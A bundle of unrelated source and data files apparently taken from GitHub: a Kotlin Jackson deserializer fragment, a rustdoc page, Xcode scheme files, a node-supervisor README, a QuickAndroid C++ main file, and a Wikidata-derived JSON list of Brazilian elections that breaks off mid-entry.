BeanDeserializerModifier() { override fun modifyDeserializer(config: DeserializationConfig, description: BeanDescription, deserializer: JsonDeserializer<*>): JsonDeserializer<*> { val modified = super.modifyDeserializer(config, description, deserializer) return if (Amount::class.java.isAssignableFrom(description.beanClass)) { AmountDeserializer(modified) } else { modified } } } private class AmountDeserializer(delegate: JsonDeserializer<*>) : DelegatingDeserializer(delegate) { override fun newDelegatingInstance(newDelegatee: JsonDeserializer<*>) = AmountDeserializer(newDelegatee) override fun deserialize(parser: JsonParser, context: DeserializationContext?): Any { return if (parser.currentToken() == JsonToken.VALUE_STRING) { /* * This is obviously specific to Amount<Currency>, and is here to * preserve the original deserializing behaviour for this case. */ Amount.parseCurrency(parser.text) } else { /* * Otherwise continue deserializing our Bean as usual. */ _delegatee.deserialize(parser, context) } } } @JsonDeserialize(using = JacksonSupport.OpaqueBytesDeserializer::class) private interface ByteSequenceMixin { @Suppress("unused") @JsonValue fun copyBytes(): ByteArray } @JsonSerialize @JsonDeserialize private interface ByteSequenceWithPropertiesMixin { @Suppress("unused") @JsonValue(false) fun copyBytes(): ByteArray }
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="generator" content="rustdoc"> <meta name="description" content="API documentation for the Rust `DIGITS` constant in crate `std`."> <meta name="keywords" content="rust, rustlang, rust-lang, DIGITS"> <title>std::f64::DIGITS - Rust</title> <link rel="stylesheet" type="text/css" href="../../rustdoc.css"> <link rel="stylesheet" type="text/css" href="../../main.css"> <link rel="shortcut icon" href="https://doc.rust-lang.org/favicon.ico"> </head> <body class="rustdoc"> <!--[if lte IE 8]> <div class="warning"> This old browser is unsupported and will most likely display funky things. </div> <![endif]--> <nav class="sidebar"> <a href='../../std/index.html'><img src='https://www.rust-lang.org/logos/rust-logo-128x128-blk-v2.png' alt='' width='100'></a> <p class='location'><a href='../index.html'>std</a>::<wbr><a href='index.html'>f64</a></p><script>window.sidebarCurrent = {name: 'DIGITS', ty: 'constant', relpath: ''};</script><script defer src="sidebar-items.js"></script> </nav> <nav class="sub"> <form class="search-form js-only"> <div class="search-container"> <input class="search-input" name="search" autocomplete="off" placeholder="Click or press ‘S’ to search, ‘?’ for more options…" type="search"> </div> </form> </nav> <section id='main' class="content constant"> <h1 class='fqn'><span class='in-band'><a href='../index.html'>std</a>::<wbr><a href='index.html'>f64</a>::<wbr><a class='constant' href=''>DIGITS</a></span><span class='out-of-band'><span id='render-detail'> <a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs"> [<span class='inner'>&#x2212;</span>] </a> </span><a id='src-185' class='srclink' href='../../core/f64/constant.DIGITS.html?gotosrc=185' title='goto source code'>[src]</a></span></h1> <pre class='rust const'>pub const DIGITS: <a class='primitive' href='../primitive.u32.html'>u32</a><code> = </code><code>15</code></pre></section> <section id='search' class="content hidden"></section> <section class="footer"></section> <aside id="help" class="hidden"> <div> <h1 class="hidden">Help</h1> <div class="shortcuts"> <h2>Keyboard Shortcuts</h2> <dl> <dt>?</dt> <dd>Show this help dialog</dd> <dt>S</dt> <dd>Focus the search field</dd> <dt>&larrb;</dt> <dd>Move up in search results</dd> <dt>&rarrb;</dt> <dd>Move down in search results</dd> <dt>&#9166;</dt> <dd>Go to active search result</dd> </dl> </div> <div class="infos"> <h2>Search Tricks</h2> <p> Prefix searches with a type followed by a colon (e.g. <code>fn:</code>) to restrict the search to a given type. </p> <p> Accepted types are: <code>fn</code>, <code>mod</code>, <code>struct</code>, <code>enum</code>, <code>trait</code>, <code>type</code>, <code>macro</code>, and <code>const</code>. </p> <p> Search functions by type signature (e.g. <code>vec -> usize</code>) </p> </div> </div> </aside> <script> window.rootPath = "../../"; window.currentCrate = "std"; window.playgroundUrl = "https://play.rust-lang.org/"; </script> <script src="../../jquery.js"></script> <script src="../../main.js"></script> <script src="../../playpen.js"></script> <script defer src="../../search-index.js"></script> </body> </html>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <Scheme LastUpgradeVersion = "0910" version = "1.3"> <BuildAction parallelizeBuildables = "YES" buildImplicitDependencies = "YES"> <BuildActionEntries> <BuildActionEntry buildForTesting = "YES" buildForRunning = "YES" buildForProfiling = "YES" buildForArchiving = "YES" buildForAnalyzing = "YES"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildActionEntry> </BuildActionEntries> </BuildAction> <TestAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" shouldUseLaunchSchemeArgsEnv = "YES"> <Testables> </Testables> <MacroExpansion> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </MacroExpansion> <AdditionalOptions> </AdditionalOptions> </TestAction> <LaunchAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" launchStyle = "0" useCustomWorkingDirectory = "NO" ignoresPersistentStateOnLaunch = "NO" debugDocumentVersioning = "YES" debugServiceExtension = "internal" allowLocationSimulation = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> <AdditionalOptions> </AdditionalOptions> </LaunchAction> <ProfileAction buildConfiguration = "Release" shouldUseLaunchSchemeArgsEnv = "YES" savedToolIdentifier = "" useCustomWorkingDirectory = "NO" debugDocumentVersioning = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> </ProfileAction> <AnalyzeAction buildConfiguration = "Debug"> </AnalyzeAction> <ArchiveAction buildConfiguration = "Release" revealArchiveInOrganizer = "YES"> </ArchiveAction> </Scheme>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <Scheme LastUpgradeVersion = "0910" version = "1.3"> <BuildAction parallelizeBuildables = "YES" buildImplicitDependencies = "YES"> <BuildActionEntries> <BuildActionEntry buildForTesting = "YES" buildForRunning = "YES" buildForProfiling = "YES" buildForArchiving = "YES" buildForAnalyzing = "YES"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildActionEntry> </BuildActionEntries> </BuildAction> <TestAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" shouldUseLaunchSchemeArgsEnv = "YES"> <Testables> </Testables> <MacroExpansion> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </MacroExpansion> <AdditionalOptions> </AdditionalOptions> </TestAction> <LaunchAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" launchStyle = "0" useCustomWorkingDirectory = "NO" ignoresPersistentStateOnLaunch = "NO" debugDocumentVersioning = "YES" debugServiceExtension = "internal" allowLocationSimulation = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> <AdditionalOptions> </AdditionalOptions> </LaunchAction> <ProfileAction buildConfiguration = "Profile" shouldUseLaunchSchemeArgsEnv = "YES" savedToolIdentifier = "" useCustomWorkingDirectory = "NO" debugDocumentVersioning = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> </ProfileAction> <AnalyzeAction buildConfiguration = "Debug"> </AnalyzeAction> <ArchiveAction buildConfiguration = "Release" revealArchiveInOrganizer = "YES"> </ArchiveAction> </Scheme>
{ "pile_set_name": "Github" }
<?xml version="1.0" encoding="UTF-8"?> <Scheme LastUpgradeVersion = "0910" version = "1.3"> <BuildAction parallelizeBuildables = "YES" buildImplicitDependencies = "YES"> <BuildActionEntries> <BuildActionEntry buildForTesting = "YES" buildForRunning = "YES" buildForProfiling = "YES" buildForArchiving = "YES" buildForAnalyzing = "YES"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildActionEntry> </BuildActionEntries> </BuildAction> <TestAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" shouldUseLaunchSchemeArgsEnv = "YES"> <Testables> </Testables> <MacroExpansion> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </MacroExpansion> <AdditionalOptions> </AdditionalOptions> </TestAction> <LaunchAction buildConfiguration = "Debug" selectedDebuggerIdentifier = "Xcode.DebuggerFoundation.Debugger.LLDB" selectedLauncherIdentifier = "Xcode.DebuggerFoundation.Launcher.LLDB" language = "" launchStyle = "0" useCustomWorkingDirectory = "NO" ignoresPersistentStateOnLaunch = "NO" debugDocumentVersioning = "YES" debugServiceExtension = "internal" allowLocationSimulation = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> <AdditionalOptions> </AdditionalOptions> </LaunchAction> <ProfileAction buildConfiguration = "Release" shouldUseLaunchSchemeArgsEnv = "YES" savedToolIdentifier = "" useCustomWorkingDirectory = "NO" debugDocumentVersioning = "YES"> <BuildableProductRunnable runnableDebuggingMode = "0"> <BuildableReference BuildableIdentifier = "primary" BlueprintIdentifier = "97C146ED1CF9000F007C117D" BuildableName = "Runner.app" BlueprintName = "Runner" ReferencedContainer = "container:Runner.xcodeproj"> </BuildableReference> </BuildableProductRunnable> </ProfileAction> <AnalyzeAction buildConfiguration = "Debug"> </AnalyzeAction> <ArchiveAction buildConfiguration = "Release" revealArchiveInOrganizer = "YES"> </ArchiveAction> </Scheme>
{ "pile_set_name": "Github" }
# node-supervisor A little supervisor script for nodejs. It runs your program, and watches for code changes, so you can have hot-code reloading-ish behavior, without worrying about memory leaks and making sure you clean up all the inter-module references, and without a whole new `require` system. ## node-supervisor -? Node Supervisor is used to restart programs when they crash. It can also be used to restart programs when a *.js file changes. Usage: supervisor [options] <program> supervisor [options] -- <program> [args ...] Required: <program> The program to run. Options: -w|--watch <watchItems> A comma-delimited list of folders or js files to watch for changes. When a change to a js file occurs, reload the program Default is '.' -i|--ignore <ignoreItems> A comma-delimited list of folders to ignore for changes. No default -p|--poll-interval <milliseconds> How often to poll watched files for changes. Defaults to Node default. -e|--extensions <extensions> Specific file extensions to watch in addition to defaults. Used when --watch option includes folders Default is 'node|js' -x|--exec <executable> The executable that runs the specified program. Default is 'node' --debug Start node with --debug flag. --debug-brk Start node with --debug-brk flag. -n|--no-restart-on error|exit Don't automatically restart the supervised program if it ends. Supervisor will wait for a change in the source files. If "error", an exit code of 0 will still restart. If "exit", no restart regardless of exit code. -h|--help|-? Display these usage instructions. -q|--quiet Suppress DEBUG messages Examples: supervisor myapp.js supervisor myapp.coffee supervisor -w scripts -e myext -x myrunner myapp supervisor -w lib,server.js,config.js server.js supervisor -- server.js -h host -p port ## Simple Install Install npm, and then do this: npm install supervisor -g You don't even need to download or fork this repo at all. ## Fancy Install Get this code, install npm, and then do this: npm link ## todo 1. Re-attach to a process by pid. If the supervisor is backgrounded, and then disowned, the child will keep running. At that point, the supervisor may be killed, but the child will keep on running. It'd be nice to have two supervisors that kept each other up, and could also perhaps run a child program. 2. Run more types of programs than just "node blargh.js". 3. Be able to run more than one program, so that you can have two supervisors supervise each other, and then also keep some child server up. 4. When watching, it'd be good to perhaps bring up a new child and then kill the old one gently, rather than just crashing the child abruptly. 5. Keep the pid in a safe place, so another supervisor can pull it out if told to supervise the same program. 6. It'd be pretty cool if this program could be run just like doing `node blah.js`, but could somehow "know" which files had been loaded, and restart whenever a touched file changes.
{ "pile_set_name": "Github" }
#include <QtCore> #include <QGuiApplication> #include <QQmlApplicationEngine> #include <QQuickView> #include <QQmlContext> #include "quickandroid.h" #include "qadrawableprovider.h" #include "qasystemdispatcher.h" #include "automator.h" #ifdef Q_OS_ANDROID #include <QtAndroidExtras/QAndroidJniObject> #include <QtAndroidExtras/QAndroidJniEnvironment> JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void*) { Q_UNUSED(vm); qDebug("NativeInterface::JNI_OnLoad()"); // It must call this function within JNI_OnLoad to enable System Dispatcher QASystemDispatcher::registerNatives(); /* Optional: Register your own service */ // Call quickandroid.example.ExampleService.start() QAndroidJniObject::callStaticMethod<void>("quickandroid/example/ExampleService", "start", "()V"); return JNI_VERSION_1_6; } #endif int main(int argc, char *argv[]) { #if (QT_VERSION >= QT_VERSION_CHECK(5, 6, 0)) QGuiApplication::setAttribute(Qt::AA_EnableHighDpiScaling); #endif QGuiApplication app(argc, argv); QQmlApplicationEngine engine; /* QuickAndroid Initialization */ engine.addImportPath("qrc:///"); // Add QuickAndroid into the import path /* End of QuickAndroid Initialization */ // Extra features: QADrawableProvider* provider = new QADrawableProvider(); provider->setBasePath("qrc://res"); engine.addImageProvider("drawable",provider); engine.load(QUrl(QStringLiteral("qrc:///main.qml"))); /* Testing Code. Not needed for regular project */ Automator* automator = new Automator(); automator->start(); qDebug() << "Start QuickAndroid Example Program"; return app.exec(); }
{ "pile_set_name": "Github" }
{ "Q10271554": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271554" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1945", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1945", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1945" ] }, "Q10271555": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271555" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1950", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1950", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1950" ], "follows": "Brazilian general election, 1945", "followed_by": "Brazilian presidential election, 1955", "office": "President of Brazil", "successful_candidates": [ "Getúlio Vergas" ] }, "Q10271556": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271556" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1954", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1954", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1954" ] }, "Q10271557": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271557" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1958", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1958", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1958" ] }, "Q10271558": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271558" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1962", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian legislative election, 1962", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1962" ] }, "Q10271560": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271560" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1974", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1974", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1974" ] }, "Q10271561": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271561" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1970", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian legislative election, 1970", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1970" ] }, "Q10271562": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q10271562" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1978", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1978", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1978" ] }, "Q1045449": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q1045449" } ], "other_names": [ { "lang": "pt", "name": "eleições gerais no Brasil em 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ko", "name": "2010년 브라질 총선거", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "fr", "name": "élections générales brésiliennes de 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt-br", "name": "eleições gerais no Brasil em 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "zh", "name": "巴西大选", "note": "multilingual", "source": "wikidata-label" }, { "lang": "el", "name": "Βραζιλιανικές βουλευτικές εκλογές 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en-ca", "name": "Brazilian general election, 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en-gb", "name": "Brazilian general election, 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ja", "name": "2010年ブラジル総選挙", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição de 2010", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições 2010", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições gerais brasileiras de 2010", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições brasileiras de 2010", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleição geral no Brasil em 2010", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "2010" ], "follows": "Brazilian general election, 2006", "followed_by": "Brazilian general election, 2014", "successful_candidates": [ "Dilma Rousseff" ] }, "Q16953490": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q16953490" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1978", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones legislativas de Brasil de 1978", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1978" ] }, "Q20052286": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q20052286" } ], "other_names": [ { "lang": "pt", "name": "Eleições gerais no Brasil em 1935", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1935", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1935" ] }, "Q2164948": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q2164948" } ], "other_names": [ { "lang": "nl", "name": "Braziliaanse parlementsverkiezingen 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "de", "name": "Wahlen in Brasilien 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ro", "name": "Alegeri legislative în Brazilia, 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "nb", "name": "Valget i Brasil 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 2006", "note": "multilingual", "source": "wikidata-label" }, { "lang": "haw", "name": "Hāmaniu cīsuāma ua Palakila mai 2006", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "2006-10-01" ], "follows": "Brazilian general election, 2002", "followed_by": "Brazilian presidential election, 2010", "office": "President of Brazil", "successful_candidates": [ "Luiz Inácio 'Lula' da Silva" ] }, "Q2346732": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q2346732" } ], "other_names": [ { "lang": "pt", "name": "Eleição presidencial brasileira de 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ro", "name": "Alegeri generale în Brazilia", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "fr", "name": "Élection présidentielle brésilienne de 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 1998", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições presidenciais brasileiras de 1998", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleição presidencial do Brasil em 1998", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "it", "name": "Elezioni generali brasiliane 1998", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "1998-10-04" ], "follows": "Brazilian general election, 1994", "followed_by": "Brazilian general election, 2002", "office": "President of Brazil", "successful_candidates": [ "Fernando Henrique Cardoso" ] }, "Q3722281": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q3722281" } ], "other_names": [ { "lang": "en", "name": "Brazilian parliamentary election, 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "Elezioni parlamentari brasiliane del 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições parlamentares no Brasil em 2010", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "Elezioni generali brasiliane 2010", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "2010-10-03" ] }, "Q3722534": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q3722534" } ], "other_names": [ { "lang": "en", "name": "Brazilian general election, 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição presidencial no Brasil em 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt-br", "name": "Eleição presidencial no Brasil em 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "de", "name": "Wahlen in Brasilien 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "fr", "name": "élection présidentielle brésilienne de 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 2002", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição presidencial brasileira de 2002", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições brasileiras de 2002", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "Eleições presidenciais no Brasil em 2002", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "2002-10-27" ], "follows": "Brazilian general election, 1998", "followed_by": "2006 Brazilian presidential election", "office": "President of Brazil", "successful_candidates": [ "Luiz Inácio 'Lula' da Silva" ] }, "Q4958829": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958829" } ], "other_names": [ { "lang": "ro", "name": "Alegeri generale în Brazilia, 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "en", "name": "Brazilian general election, 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição presidencial brasileira de 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones generales de Brasil de 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "fr", "name": "Élection présidentielle brésilienne de 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "eleiciones xenerales de Brasil de 1994", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleição presidencial de 1994", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "1994-10-03" ], "follows": "Brazilian presidential election, 1989", "followed_by": "Brazilian general election, 1998", "office": "President of Brazil", "successful_candidates": [ "Fernando Henrique Cardoso" ] }, "Q4958841": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958841" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1954", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1954" ] }, "Q4958842": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958842" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1958", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1958" ] }, "Q4958845": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958845" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1947", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1947", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": "Elecciones legislativas de Brasil de 1947", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1947" ] }, "Q4958846": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958846" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1966", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1966", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1966" ] }, "Q4958849": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958849" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1974", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1974" ] }, "Q4958850": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958850" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1982", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1982", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições Gerais no Brasil em 1982", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "1982" ] }, "Q4958851": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958851" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1986", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1986", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1986" ] }, "Q4958852": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958852" } ], "other_names": [ { "lang": "en", "name": "Brazilian legislative election, 1990", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni parlamentari in Brasile del 1990", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "Eleições gerais no Brasil em 1990", "note": "multilingual", "source": "wikidata-label" } ], "dates": [ "1990" ] }, "Q4958898": { "identifiers": [ { "scheme": "wikidata", "identifier": "Q4958898" } ], "other_names": [ { "lang": "en", "name": "Brazilian general election, 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "eleições gerais no Brasil em 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "fr", "name": "élections générales brésiliennes de 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ru", "name": "Всеобщие выборы в Бразилии", "note": "multilingual", "source": "wikidata-label" }, { "lang": "da", "name": "Valgene i Brasilien 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "de", "name": "Wahlen in Brasilien 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "zh", "name": "2014年巴西大选", "note": "multilingual", "source": "wikidata-label" }, { "lang": "it", "name": "elezioni generali in Brasile del 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "es", "name": 